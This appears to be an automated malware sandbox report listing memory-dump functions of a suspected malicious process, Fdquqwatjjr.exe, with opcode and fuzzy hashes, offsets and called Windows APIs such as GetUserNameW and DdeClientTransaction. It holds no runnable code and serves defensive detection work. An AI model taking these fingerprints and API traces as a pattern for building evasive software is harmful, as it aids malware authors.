Source File: 00000004.00000002.263535540.0000000000DDD000.00000040.00000001.sdmp, Offset: 00DDD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2afa457568e0bb640a5e96658e9777ab49a47e984ab559958fa4953148591eca
Instruction ID: d5457d5f58192bff5d8aeb4f299ee5447cc6930d666301c5f3e92f1f0ed46bff
Opcode Fuzzy Hash: 2afa457568e0bb640a5e96658e9777ab49a47e984ab559958fa4953148591eca
Instruction Fuzzy Hash: 9611B176404280DFCF12CF14D9C4B56BF72FB85324F2886AAD8050B756C336D85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DDD3AF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.263535540.0000000000DDD000.00000040.00000001.sdmp, Offset: 00DDD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2afa457568e0bb640a5e96658e9777ab49a47e984ab559958fa4953148591eca
Instruction ID: 923c70bbf255e56b923cad3d0c3b642d83308b49744699fec7de3db0b43cdbbd
Opcode Fuzzy Hash: 2afa457568e0bb640a5e96658e9777ab49a47e984ab559958fa4953148591eca
Instruction Fuzzy Hash: 7E116D76504280DFCF15CF10D5C4B56BF72FB94324F28C6AAD8454B656C336E85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E41040, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.263608854.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be113c8aa7a8806d6d15bd530b5d74ba9a7bd74421a795c2292b9925cc48ec90
Instruction ID: ba228bfb6521fc88b57a579c7763b9d37564ba1889d00414a688c3defa119e0a
Opcode Fuzzy Hash: be113c8aa7a8806d6d15bd530b5d74ba9a7bd74421a795c2292b9925cc48ec90
Instruction Fuzzy Hash: 7B118B74B002048F8B54EBB9E5449AA77E6AF8924872104B9C40AEB714EB31DC85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E41031, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.263608854.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eae62e865384fd1704fc91a47374d0b86e9c32649e12b9326793da9505f8f6f1
Instruction ID: fe76d445793642d1d1289ecd85e1b61503341e081778f559269a386988d18fdf
Opcode Fuzzy Hash: eae62e865384fd1704fc91a47374d0b86e9c32649e12b9326793da9505f8f6f1
Instruction Fuzzy Hash: 4A11E174B04244CFCB44EBB8D5559AABBF2EF8925871504B8C409DB724EB31CC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E40A3D, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.263608854.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c2aa6c7f5db092af4a18e824eaf9ffb6f8c3c4011007515cabb373c9c90da7c
Instruction ID: eea17a16f79fd8bbaa470be9e5b3e7014c7e2a6570dbab931d75a8453ae6e1fe
Opcode Fuzzy Hash: 6c2aa6c7f5db092af4a18e824eaf9ffb6f8c3c4011007515cabb373c9c90da7c
Instruction Fuzzy Hash: 6F01A9303083904FC306A7BA585559E3BF6DFCB1A831544FAD509CF3A6DE258C0683B2

Uniqueness

Uniqueness Score: -1.00%

Function 00E41588, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.263608854.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70c745d726a3d0be9bf9ae086622b92e7bc0283dca196fcae2ca8e7d2f27e339
Instruction ID: fa42235bb36b5f165fe4a3f24134c621c6ff2d2e463ee79ad8096091e9b53f7e
Opcode Fuzzy Hash: 70c745d726a3d0be9bf9ae086622b92e7bc0283dca196fcae2ca8e7d2f27e339
Instruction Fuzzy Hash: C6E093313087944BCB35E378D0103DE77D25F4131CF00085EC54B97B81C767A9058362

Uniqueness

Uniqueness Score: -1.00%

Function 00E41608, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.263608854.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa3b583499b651ccb1d8fafc3a7762af4727f7b20a4ddc653c1da0d647b28fd9
Instruction ID: 4c571ab61b37d05b570c01f872db5860a9a76b1a15aca4dbc093062493f5d2b6
Opcode Fuzzy Hash: fa3b583499b651ccb1d8fafc3a7762af4727f7b20a4ddc653c1da0d647b28fd9
Instruction Fuzzy Hash: E7D0A7307000145B860466BDE4054BE37FDCF8B6147900079E006EFB51CE35EC0007E6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: Fdquqwatjjr.exe PID: 7032 Parent PID: 6872 Fdquqwatjjr.exeCOMMON

Executed Functions

Function 00A133E0, Relevance: 4.6, APIs: 2, Instructions: 1561COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.486275296.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9228330edf6ac9d176d32dae5ed787bf6107bd2c6f6305f991d6bad6c1eadaf
Instruction ID: 3d801050c15a9138d9cdc54b0463c984ccde84e49cfbd3c341fa5280fef68ba3
Opcode Fuzzy Hash: c9228330edf6ac9d176d32dae5ed787bf6107bd2c6f6305f991d6bad6c1eadaf
Instruction Fuzzy Hash: 51D2F270B082849FDB14DB6DC8A4B99BBF2AF95305F1584AAE015DF3A2C731ED81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05A62654, Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 05A6B633

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 1d0e39b57d90a6afe943704a172c336fa11f53ad87ce12cbc376bb1ca7275db8
Instruction ID: 15dd636d3801b4437595b4ea4fe3835278a5a094bed244afc535ff9d3c395de3
Opcode Fuzzy Hash: 1d0e39b57d90a6afe943704a172c336fa11f53ad87ce12cbc376bb1ca7275db8
Instruction Fuzzy Hash: 19510374E002188FDB14DFA9C984BEDBBB1BF48314F158129E826AB390D7749844CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C59E, Relevance: 8.1, APIs: 5, Instructions: 643COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 68ff3c961472f841024fcf6c1b3b0552961f6dab4550f76b92903c43d5b03c3b
Instruction ID: e75447639b25b4480c24cd0fb6c8752602d156b4647a4113bc6c288deb05516b
Opcode Fuzzy Hash: 68ff3c961472f841024fcf6c1b3b0552961f6dab4550f76b92903c43d5b03c3b
Instruction Fuzzy Hash: 7262F934A11228CFCB65DF30D858AADB7B6BF49346F2041EAE40AA7750CB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C5BF, Relevance: 7.9, APIs: 5, Instructions: 396COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 3d0d7d544d3e3a95143a344c9f4c5bd2f39871daab04de92ed8c278b7dbb67d8
Instruction ID: 2ceae024fc2fe93c420a0d1f668e537fa7b7391031421275a8694347ed40da0d
Opcode Fuzzy Hash: 3d0d7d544d3e3a95143a344c9f4c5bd2f39871daab04de92ed8c278b7dbb67d8
Instruction Fuzzy Hash: CB12EA34911328CFCB69DF20D859A9DB7B6FF49246F2041EAE40AA3350CB799E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C606, Relevance: 7.9, APIs: 5, Instructions: 389COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 59b50c17ffcd65ac508b13108981772353aa7b91251056ef4f513b9a244a6709
Instruction ID: 9450b4e6e32052b6ba0b76075a3686f11d179f9c42ead3ef8426d9fe5db4a9c6
Opcode Fuzzy Hash: 59b50c17ffcd65ac508b13108981772353aa7b91251056ef4f513b9a244a6709
Instruction Fuzzy Hash: 9812EB34911328CFCB69DF20D859A9DB7B6FF49246F2041EAE40AA3350CB799E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C64D, Relevance: 7.9, APIs: 5, Instructions: 380COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 882d959af3cf736b7abb71838b396748b95b0ce7514a9c3a32dbca313b09d46d
Instruction ID: 3fac92815a0d31bea58df8d90d979baca6ab3b3244497b4728036b8365401c43
Opcode Fuzzy Hash: 882d959af3cf736b7abb71838b396748b95b0ce7514a9c3a32dbca313b09d46d
Instruction Fuzzy Hash: 2202FB34911328CFCB69DF20D859A9DB7B6FF49246F2041EAE40AA3350CB799E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C68B, Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 6e4c3258e4d58d9ce6c609efb012a26709e0f9f6af8440e9b92756322979f2cf
Instruction ID: e6028f04fab967a8d0aeb3f285f05496ca38aa3638bfaabf9303700f69847918
Opcode Fuzzy Hash: 6e4c3258e4d58d9ce6c609efb012a26709e0f9f6af8440e9b92756322979f2cf
Instruction Fuzzy Hash: AA02FB34911328CFCB69DF20D859A9DB7B6FF49246F2041EAE40AA3350CB799E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C6D2, Relevance: 7.9, APIs: 5, Instructions: 368COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: eecb0025975b1fd3b05e6f86cd3ee81fb2b03155f5aec07e5ba34a0bf957f379
Instruction ID: 250bb82784bf0c05d6b9351c4047c260afb96b61e5765aa71c0e8167c905398f
Opcode Fuzzy Hash: eecb0025975b1fd3b05e6f86cd3ee81fb2b03155f5aec07e5ba34a0bf957f379
Instruction Fuzzy Hash: FE02EA34911328CFCB69DF20D859A9DB7B6FF49246F2041EAE40AA3350CB399E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C719, Relevance: 7.9, APIs: 5, Instructions: 359COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: ed1e26b5feaaf5c0f807c9a97b2514b348a4708ccea1a09b4efd7bdd3a8e86c4
Instruction ID: 92d500df30990aa72376e307028f32d7bd3a2971f1021b50089fadf5fbe1f087
Opcode Fuzzy Hash: ed1e26b5feaaf5c0f807c9a97b2514b348a4708ccea1a09b4efd7bdd3a8e86c4
Instruction Fuzzy Hash: 9402EA34911328CFCB69DF20D859A9DB7B6FF49246F2041EAE40AA3350CB799E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C757, Relevance: 7.9, APIs: 5, Instructions: 354COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: c6f9d38d869adc65a3c97bfc3db311de5d8283bf4f9108e11d1e31e0261aea76
Instruction ID: 551a8840d54b6dbc862b98454f07e1596ba7eac059f1ba5b7c9fd4787c65150b
Opcode Fuzzy Hash: c6f9d38d869adc65a3c97bfc3db311de5d8283bf4f9108e11d1e31e0261aea76
Instruction Fuzzy Hash: 9E02FB34911329CFCB69DF20D859A9DB7B6FF48246F1041EAE40AA3350CB399E81CF65

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C79E, Relevance: 7.8, APIs: 5, Instructions: 347COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: bb2ffd621642986b1bd6fe6282eb5f675c9dffd9bb869ecc36b1a24ed26cbe34
Instruction ID: 913169c7fe60022178c1d14ed1c1da7482e25f4ce66934f4854f5530658ac9bb
Opcode Fuzzy Hash: bb2ffd621642986b1bd6fe6282eb5f675c9dffd9bb869ecc36b1a24ed26cbe34
Instruction Fuzzy Hash: 25F1FA34911328CFCB69DF24D859A9DB7B6FF48246F2041EAE40AA3350CB799E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C7E5, Relevance: 7.8, APIs: 5, Instructions: 338COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 263c9b6e8826fce6c177f8a9efdce28ede6ba38ba9ea47502846194f14e90a5c
Instruction ID: f09de12e2b91edfd237bf787d9a4df99dfc776780a3d0ea65d2ef76218370acb
Opcode Fuzzy Hash: 263c9b6e8826fce6c177f8a9efdce28ede6ba38ba9ea47502846194f14e90a5c
Instruction Fuzzy Hash: CFF1FB34911328CFCB69DF24D859A9DB7B6FF48246F2041EAE40AA3350CB399E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C839, Relevance: 7.8, APIs: 5, Instructions: 329COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 1644fe8e73a3e4099b5c5b2d673b5e2d6c76b30c563d246f752b6b05f850eee9
Instruction ID: 0ca1c378c748048b3f72cd590ca3514f6c2c85aa96d925d2998849d4ea628804
Opcode Fuzzy Hash: 1644fe8e73a3e4099b5c5b2d673b5e2d6c76b30c563d246f752b6b05f850eee9
Instruction Fuzzy Hash: 67F1EA34911328CFCB69DF20D859A9DB7B6FF49246F1041EAE40AA3350CB399E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C880, Relevance: 7.8, APIs: 5, Instructions: 320COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 7a15eea8ad1b565cb7b1f4e04d941285bd6a4404efdb7273fbf035a4f4e0b917
Instruction ID: d24ace26bb13e16be125a7f25110cf440cc512c0b8e948d37431d887886857c6
Opcode Fuzzy Hash: 7a15eea8ad1b565cb7b1f4e04d941285bd6a4404efdb7273fbf035a4f4e0b917
Instruction Fuzzy Hash: F4E1FB34911329CFCB69DF20D859A9DB7B6FF48246F1081EAE40AA3350CB359E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C8BE, Relevance: 7.8, APIs: 5, Instructions: 315COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: c0af133aa7e5825976330ffe485f26639638f4829a44d5339953c47e6fed36b8
Instruction ID: 9cdd168a42e213308fb409e122adebe7bbbe5a55b6dfea719bc76f41b8b6547c
Opcode Fuzzy Hash: c0af133aa7e5825976330ffe485f26639638f4829a44d5339953c47e6fed36b8
Instruction Fuzzy Hash: 62E1EA34A11328CFCB69DF20D859A9DB7B6BF48246F1041EAE40AA3750CB399E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C905, Relevance: 7.8, APIs: 5, Instructions: 308COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 548219f87755aaf87f5c9bd8f51bbacae123a5756ad078b8f63b5875de762345
Instruction ID: e5432a5efe7cba88bd2815623aa7e4f4f8e694333e94c1d8126602e6d739c2b0
Opcode Fuzzy Hash: 548219f87755aaf87f5c9bd8f51bbacae123a5756ad078b8f63b5875de762345
Instruction Fuzzy Hash: D2E10A34A11329CFCB69DF20D859A9DB7B6FF48246F1081EAE40AA3350CB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C94C, Relevance: 7.8, APIs: 5, Instructions: 301COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 919ed306bc6f6d0d01db856311b72b9b4de1b1bcffc8cd50f14b82a5d20d71cb
Instruction ID: 1e3d968684e844703ad1a3fc2131d915636968c285b260ce9bded170375d3d44
Opcode Fuzzy Hash: 919ed306bc6f6d0d01db856311b72b9b4de1b1bcffc8cd50f14b82a5d20d71cb
Instruction Fuzzy Hash: D6E1F934A11329CFCB69DF20D859A9DB7B6BF48246F1041EAE40AA3750CB399E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C993, Relevance: 7.8, APIs: 5, Instructions: 294COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: f4244153394cc60e181e7e95b42676b9da4df8da991e06262f951f480b536f9f
Instruction ID: 123426d8eb64aaafda845cfa35e7c6cd4090d8b9ef25a32b05aed454b993b325
Opcode Fuzzy Hash: f4244153394cc60e181e7e95b42676b9da4df8da991e06262f951f480b536f9f
Instruction Fuzzy Hash: C7D10A34A11329CFCB69DF20D859A9DB7B6BF48246F1041EAE40AA3750CB399E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6C9DA, Relevance: 7.8, APIs: 5, Instructions: 287COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 99438c9927c13d11e2dc451bccc9543551bd2ee1d9e63b2e8775f3d7ce11f7a7
Instruction ID: 4a5d2527abb8537dbc9b2964846428e4b5b91af96228a1ce410a145bf9a3b5e0
Opcode Fuzzy Hash: 99438c9927c13d11e2dc451bccc9543551bd2ee1d9e63b2e8775f3d7ce11f7a7
Instruction Fuzzy Hash: 12D10A34A11329CFCB69DF30D859A9DB7B6BF48246F1041EAE40AA3750CB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CA21, Relevance: 7.8, APIs: 5, Instructions: 280COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 497f4df0beff25d5d1580c2a6b97f57d84c2f07bf415a0c1743e3b4b76bcb620
Instruction ID: f33119ab1e6284059f9162013c7453226e599c12ac1c2e78f43e702d44227454
Opcode Fuzzy Hash: 497f4df0beff25d5d1580c2a6b97f57d84c2f07bf415a0c1743e3b4b76bcb620
Instruction Fuzzy Hash: C2D1FB34A11328CFCB69DF34D859A9DB7B6BF48246F1081EAE40AA3750CB359E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CA68, Relevance: 7.8, APIs: 5, Instructions: 273COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: cf7369a60f23b2ae818d0bda93fd2293b643dd2d3dd28f8833a54c68ba22990b
Instruction ID: d5f55c48fb7eb6042451ff4976a4d2715de586f7e2b72c11deab3cbf7b26a71c
Opcode Fuzzy Hash: cf7369a60f23b2ae818d0bda93fd2293b643dd2d3dd28f8833a54c68ba22990b
Instruction Fuzzy Hash: F3D1FB34A11328CFCB69DF24D859A9DB7B6FF48246F1041EAE40AA3750CB399E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CAAF, Relevance: 7.8, APIs: 5, Instructions: 264COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 6a1f2a454bc2ca96a51ff0f0afabdb463096cfb72f49bd4ae0462f87bc7c2c87
Instruction ID: 7d58d9bd05340054e9f787ce96002f3f0a396a8ed3123f27af5a80a290f241c1
Opcode Fuzzy Hash: 6a1f2a454bc2ca96a51ff0f0afabdb463096cfb72f49bd4ae0462f87bc7c2c87
Instruction Fuzzy Hash: 1FC1FB34A11328CFCB69DF24D859AADB7BAFF48246F1041EAE40A93750CB359E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CAED, Relevance: 7.8, APIs: 5, Instructions: 259COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 6275062b0b7d5ce78514091d34750d7b60ddfc7be4401b7f1a87d634fa30042c
Instruction ID: 99199eb7c08230950c052134d4570920a0a53c58fd83db7b6543db2bda2172c9
